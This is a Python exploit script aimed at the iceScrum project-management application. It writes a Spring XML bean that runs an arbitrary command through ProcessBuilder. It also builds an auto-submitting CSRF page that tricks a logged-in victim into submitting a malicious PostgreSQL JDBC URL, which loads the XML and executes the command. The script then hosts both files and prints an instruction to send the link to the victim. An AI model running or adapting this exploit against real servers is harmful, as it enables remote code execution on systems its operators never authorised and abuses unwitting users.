import http.server
import socketserver
import sys
import argparse
import socket
import subprocess
import threading
import os
import platform


parser = argparse.ArgumentParser(description="Greet a user.")
parser.add_argument("--targethost", help="Target host for icescrum")
parser.add_argument("--command", help="Command to execute")
parser.add_argument("--revshell", help="Command to execute")
args = parser.parse_args()


def get_lan_ip():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
        finally:
            s.close()
    except Exception:
        try:
            return socket.gethostbyname(socket.gethostname())
        except Exception:
            return "127.0.0.1"


def build_test_xml(payload):
    payload_list=payload.split()
    xml_payload_starter="""<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <list>"""
    for i in payload_list:
        payload_to_add="<value>"+str(i)+"</value>"
        xml_payload_starter=xml_payload_starter+payload_to_add
    xml_payload_end="""
            </list>
        </constructor-arg>
        <property name="whatever" value="#{ pb.start() }" />
    </bean>
</beans>"""
    final_xml_payload=xml_payload_starter+xml_payload_end
    with open("test.xml","w") as fd:
        fd.write(final_xml_payload)





def build_and_host_csrf(targetHost):
    csrf_payload=""" <!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="TARGETHOST/icescrum/settings/testDbConnection" id="autoForm" method="post">
      <input type="hidden" name="dataSource.driverClassName" value="org.postgresql.Driver" />
    <input type="hidden" name="dataSource.url" value="jdbc:postgresql://canbeanything/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=REMOTEXML/test.xml" />
         
      </form>
<script>
    document.getElementById('autoForm').submit();
  </script>
  </body>
  </html>"""
    csrf_payload = csrf_payload.replace("TARGETHOST",targetHost)
    PORT = 4456
    ip = get_lan_ip()
    server_url = f"http://{ip}:{PORT}"
    csrf_payload = csrf_payload.replace("REMOTEXML", server_url)
    with open("index.html","w") as fd:
        fd.write(csrf_payload)
    print(f"SEND THE LINK TO VICTIM USER {server_url}")
    print()
    Handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\nShutting down server.")
            httpd.server_close()

build_test_xml(args.command)
build_and_host_csrf(args.targethost)